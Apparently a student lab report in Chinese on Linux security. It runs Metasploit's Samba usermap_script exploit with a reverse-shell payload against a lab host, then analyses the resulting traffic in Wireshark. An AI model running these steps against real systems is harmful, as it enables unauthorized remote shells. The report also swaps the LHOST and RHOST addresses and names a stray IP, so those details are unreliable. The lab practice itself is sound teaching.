1 实践内容
1.1 Linux
- Linux的优势:
- 跨平台的硬件支持
- 丰富的软件支持
- 多用户多任务
- 可靠地安全性
- 良好的稳定性
- 完善的网络功能
- linux是一种典型的宏内核结构。在硬件抽象层中的各类设备驱动程序可以完全访问硬件设备,方便地以模块化形式设置,并在系统运行期间可直接通过LKM(Loadable Kernel Module)机制装载或卸载。在硬件抽象层上是内核服务功能模块,包括进程管理,内存管理,文件系统,设备控制与网络这五个子系统。而这些内核模块通过系统调用接口向用户态的GNU运行库及工具、命令行Shell、X窗口以及应用软件提供服务。
1.2 Linux操作系统安全机制
1.3 Linux系统远程攻防技术
1.4 Linux系统本地安全攻防技术
2 实践过程
2.1 使用Metasploit进行Linux进行远程渗透攻击
- 与上一周类似,这次使用 Metasploit 工具进行Linux远程渗透攻击,攻击机IP:
192.168.200.9,靶机IP:192.168.200.16。 - 在攻击机中当中打开msfconsole,输入命令:
use exploit/multi/samba/usermap_script,使用usermap_script渗透攻击模块。 - 设置攻击的PAYLOAD为
cmd/unix/reverse。 - 设置攻击LHOST为攻击机地址
192.168.200.16,设置RHOST为靶机地址192.168.200.9。 - 通过
run开始攻击。
- 渗透攻击结果:
2.2 实践作业
- 攻击方的行为就是上一个实验中的行为,在此过程中,应该防守方使用Wireshark捕包并进行分析,但没有,在攻击方使用也是同样的效果。
- 攻击过程如上,不再赘述。
Wireshark捕包分析
- 第一个数据包是一个ARP请求报文。接着往下看第一个TCP包,
192.168.200.9向192.168.200.125发起的TCP连接请求,这应该是正式发起攻击的时间。攻击者IP:192.168.200.9,目标IP:192.168.200.16,目标端口:139。
- 接着在此追踪TCP数据流,可以看到所使用shellcode。
命令的内涵:后台运行进程并将标准输出和标准错误流重定向到linux的空设备。
nohup就是no hangup,不要挂断,忽略hup信号。标准输出内容会输出到当前目录的nohup.out日志文件中而不终端显示。sh -c...让 bash 将一个字串作为完整的命令来执行。&>中间没有空格。linux中的文件号,1是标准输出流,2是错误输出流,此处&>的意思是合并 标准输出和错误输出并重定向。/dev/null是linux的一个空设备,放入这里的数据立即清除,所以只能写,读不出来什么。最后面&就是后台运行的意思 。
- 在向下看,找到了攻击成功之后在本地执行的命令及回应。
3 学习中遇到的问题及解决问题
1.想要再安装一个主机进行实验,下了三遍,都卡死在99.9%,下不下来。
解决:还是找同学要了一个用邮箱下载。
2.使用Metasploit进行Linux进行远程渗透攻击的实验中要求设置LHOST,但在show options 没有看见。设置过就可以渗透成功了。
4 实践总结
这次的实验和上次的比较相似,难度比较小,相当于是有复习了一遍,无论是Windows还是Linux系统,掌握了原理,实现攻击的方法都是相似的。
posted on
